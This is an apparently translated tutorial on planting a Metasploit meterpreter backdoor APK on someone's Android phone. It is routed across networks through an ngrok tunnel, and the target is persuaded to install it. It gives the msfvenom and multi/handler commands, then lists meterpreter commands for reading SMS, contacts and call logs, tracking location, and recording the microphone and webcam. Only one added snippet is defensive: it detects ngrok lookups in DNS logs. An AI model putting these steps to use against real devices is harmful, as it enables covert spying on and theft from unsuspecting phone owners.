How to Exploit/Hack Android Across Different Networks with Metasploit on Termux/Linux/Windows



Android exploitation is a hacking technique used to extract information from a target device by placing a backdoor file on that device. Many things can be done this way, for example reading messages and files, and also accessing the target's camera or microphone.

This time we will learn to exploit an Android device on a different network, remotely. First of all, I wrote this article so that we can all be more careful about this hacking technique; it is meant for learning and should not be misused. Any violation committed with this technique after you read this tutorial is outside the author's responsibility. Every crime in the digital world leaves a trace, and sooner or later someone will be held accountable.
We will do it in two ways, from Kali NetHunter and from Termux. This is so that readers can practice it easily, because according to droidcyber.com Termux and Kali NetHunter are the easiest way and can be operated on a smartphone.

Tools and materials for Exploiting/Hacking Android Across Different Networks with Kali NetHunter and Termux

Android.

It is better to use a rooted Android device, and if possible Kali NetHunter. Kali NetHunter is the phone version of Kali Linux and comes equipped with many network penetration tools, including exploitation tools. If you want to install Kali NetHunter on Android, please read my tutorial on
You can also use Termux, because Termux is command-line based and can run almost all Linux commands. Termux can be downloaded below and runs without root access.

Metasploit.

Metasploit is an application and framework used for exploiting networks in hacking and IT, and it is widely used by IT people, both beginners and professionals. Metasploit produces a Meterpreter file that can be operated on the same network or across different networks, which makes control access to the target device easier.
Metasploit can be installed on Linux and its derivative distributions, on Android and on Windows.
Before the installation steps and how to use Metasploit, we first need to know what commands Metasploit has.
Below are the Metasploit commands, in English; use Google Translate to find out what they do. Further down I will explain only the main functions.

List of Metasploit commands

Core Commands
=============

    Command   Description
    -------   -----------
    ?         Help menu
    banner    Display an awesome metasploit banner
    cd        Change the current working directory
    color     Toggle color
    connect   Communicate with a host
    exit      Exit the console
    get       Gets the value of a context-specific variable
    getg      Gets the value of a global variable
    grep      Grep the output of another command
    help      Help menu
    history   Show command history
    load      Load a framework plugin
    quit      Exit the console
    repeat    Repeat a list of commands
    route     Route traffic through a session
    save      Saves the active datastores
    sessions  Dump session listings and display information about sessions
    set       Sets a context-specific variable to a value
    setg      Sets a global variable to a value
    sleep     Do nothing for the specified number of seconds
    spool     Write console output into a file as well the screen
    threads   View and manipulate background threads
    tip       Show a useful productivity tip
    unload    Unload a framework plugin
    unset     Unsets one or more context-specific variables
    unsetg    Unsets one or more global variables
    version   Show the framework and console library version numbers


Module Commands
===============

    Command     Description
    -------     -----------
    advanced    Displays advanced options for one or more modules
    back        Move back from the current context
    clearm      Clear the module stack
    info        Displays information about one or more modules
    listm       List the module stack
    loadpath    Searches for and loads modules from a path
    options     Displays global options or for one or more modules
    popm        Pops the latest module off the stack and makes it active
    previous    Sets the previously loaded module as the current module
    pushm       Pushes the active or list of modules onto the module stack
    reload_all  Reloads all modules from all defined module paths
    search      Searches module names and descriptions
    show        Displays modules of a given type, or all modules
    use         Interact with a module by name or search term/index


Job Commands
============

    Command     Description
    -------     -----------
    handler     Start a payload handler as job
    jobs        Displays and manages jobs
    kill        Kill a job
    rename_job  Rename a job


Resource Script Commands
========================

    Command   Description
    -------   -----------
    makerc    Save commands entered since start to a file
    resource  Run the commands stored in a file


Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces


Credentials Backend Commands
============================

    Command  Description
    -------  -----------
    creds    List all credentials in the database


Developer Commands
==================

    Command     Description
    -------     -----------
    edit        Edit the current module or a file with the preferred editor
    irb         Open an interactive Ruby shell in the current context
    log         Display framework.log paged to the end if possible
    pry         Open the Pry debugger on the current module or Framework
    reload_lib  Reload Ruby library files from specified paths

msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs to go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target
specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24

Those are only the commands in the msfconsole menu; the meterpreter menu has further commands specific to each device being accessed.
Next comes the Metasploit installation stage. Let's go through how to install Metasploit on Linux, Windows and Android one by one.

How to install and use Metasploit on Linux (Kali NetHunter), other Linux variants and Termux on Android

On Kali NetHunter, Metasploit is already included as a package from the NetHunter installation itself. To use Metasploit on Kali NetHunter, open a terminal and type msfconsole. Kali NetHunter is the smartphone version of Kali Linux and already ships with a package of security pentesting tools.
For installation on other Linux distributions, use the command below.
How to install Metasploit on Kali Linux
The minimal chroot version of Kali Linux of course does not have the complete package set,

    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

To use it, I tried with Kali NetHunter.

Ngrok

For a single network we do not need ngrok; across different networks, ngrok is needed so that the backdoor file can connect to the server set up on Linux. For how to install and use ngrok, please first read the tutorial on installing and using ngrok.
Once the materials are complete, we go straight to the steps for remote Android exploitation.
First we have to create the backdoor application.

How to create a backdoor application on Kali NetHunter and Termux with Metasploit.

Run ngrok with the command

    ./ngrok tcp 8080

A forwarding line will appear; look at it and copy it. It is usually tcp://0.tcp.ngrok.io:port
Note the port, open a new window and type the command

    nslookup

Then paste the ngrok forwarding address from earlier and convert it to an IP address. Note the IP.
On Kali NetHunter, simply open the NetHunter app and choose the Metasploit payload generator.

Fill in the port and IP obtained from ngrok. Then generate to SD card.
Open the file manager, share the application and tell the target to install it.
Then open the terminal again and type

    msfconsole

Type the commands

    use exploit/multi/handler
    set PAYLOAD android/meterpreter/reverse_tcp
    set LHOST 0.0.0.0
    set LPORT 8080
    exploit

Once meterpreter> appears, Metasploit has connected to the backdoor file created earlier.
Now all that remains is to exploit the target Android device with the various commands at the very bottom of this article. Adjust them to the system being exploited.
For exploitation with Termux, the method and commands are almost the same; only the backdoor application is created with the command below.
/sdcard

    msfvenom -p android/meterpreter/reverse_tcp LHOST=(ngrok ip) LPORT=(ngrok port) R > APP_NAME.APK

The app name is up to you; the Metasploit commands are the same. Installing Metasploit on Termux can be seen here.
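A defender-side check for the ngrok step above, as an added example that is not part of the original article: the backdoor reaches its handler through an ngrok TCP forwarding address such as 0.tcp.ngrok.io, so a resolver log shows which internal devices looked up such a name. The dnsmasq query-log format, the constructed sample lines, the regional-label pattern and the function name are assumptions made for this example.

```python
import re
from collections import defaultdict

# ngrok TCP forwarding names look like "0.tcp.ngrok.io" (as in the article).
# Assumption: the optional two-letter label covers regional endpoints
# such as "0.tcp.eu.ngrok.io".
NGROK_TCP = re.compile(r"^\d+\.tcp(?:\.[a-z]{2})?\.ngrok\.io$")

# dnsmasq query line: "... dnsmasq[pid]: query[TYPE] <name> from <client>"
QUERY = re.compile(
    r"dnsmasq\[\d+\]: query\[(?P<qtype>[A-Z]+)\] (?P<name>\S+) from (?P<client>\S+)"
)

# Constructed sample log (private/documentation addresses, not real traffic).
SAMPLE_LOG = """\
Mar  3 09:14:01 gw dnsmasq[812]: query[A] play.googleapis.com from 192.168.1.23
Mar  3 09:14:07 gw dnsmasq[812]: query[A] 0.tcp.ngrok.io from 192.168.1.23
Mar  3 09:14:07 gw dnsmasq[812]: forwarded 0.tcp.ngrok.io to 192.0.2.53
Mar  3 09:15:12 gw dnsmasq[812]: query[AAAA] 0.tcp.ngrok.io from 192.168.1.23
Mar  3 09:16:40 gw dnsmasq[812]: query[A] 4.tcp.eu.ngrok.io from 192.168.1.57
Mar  3 09:17:02 gw dnsmasq[812]: query[A] tcp.ngrok.io.example.org from 192.168.1.40
Mar  3 09:18:30 gw dnsmasq[812]: query[A] ngrok.com from 192.168.1.40
"""


def find_ngrok_tcp_lookups(log_text):
    """Return {client_ip: sorted ngrok TCP tunnel names that client resolved}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = QUERY.search(line)
        if not m:
            continue  # replies, forwards and other daemons' lines
        name = m.group("name").lower()
        # Anchored match: look-alike names with extra suffixes are ignored.
        if NGROK_TCP.match(name):
            hits[m.group("client")].add(name)
    return {client: sorted(names) for client, names in hits.items()}


if __name__ == "__main__":
    for client, names in sorted(find_ngrok_tcp_lookups(SAMPLE_LOG).items()):
        print(f"{client}: resolved ngrok TCP tunnel(s) {', '.join(names)}")
```

A hit only shows that a device resolved a tunnel name; developers use ngrok legitimately, so treat the result as a lead to check against the device's installed apps.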

LIST OF METASPLOIT METERPRETER COMMANDS


Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command   Description
    -------   -----------
    cat       Read the contents of a file to the screen
    cd        Change directory
    checksum  Retrieve the checksum of a file
    cp        Copy source to destination
    dir       List files (alias for ls)
    download  Download a file or directory
    edit      Edit a file
    getlwd    Print local working directory
    getwd     Print working directory
    lcd       Change local working directory
    lls       List local files
    lpwd      Print local working directory
    ls        List files
    mkdir     Make directory
    mv        Move source to destination
    pwd       Print working directory
    rm        Delete the specified file
    rmdir     Remove directory
    search    Search for files
    upload    Upload a file or directory


Stdapi: Networking Commands
===========================

    Command   Description
    -------   -----------
    ifconfig  Display interfaces
    ipconfig  Display interfaces
    portfwd   Forward a local port to a remote service
    route     View and modify the routing table


Stdapi: System Commands
=======================

    Command    Description
    -------    -----------
    execute    Execute a command
    getuid     Get the user that the server is running as
    localtime  Displays the target system's local date and time
    pgrep      Filter processes by name
    ps         List running processes
    shell      Drop into a system command shell
    sysinfo    Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command      Description
    -------      -----------
    screenshare  Watch the remote user's desktop in real time
    screenshot   Grab a screenshot of the interactive desktop


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command  Description
    -------  -----------
    play     play a waveform audio file (.wav) on the target system


Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information


Application Controller Commands
===============================

    Command        Description
    -------        -----------
    app_install    Request to install apk file
    app_list       List installed apps in the device
    app_run        Start Main Activty for package name
    app_uninstall  Request to uninstall application


About the Author: mrmixo

Inspired to become a detective, exploring just how complicated you are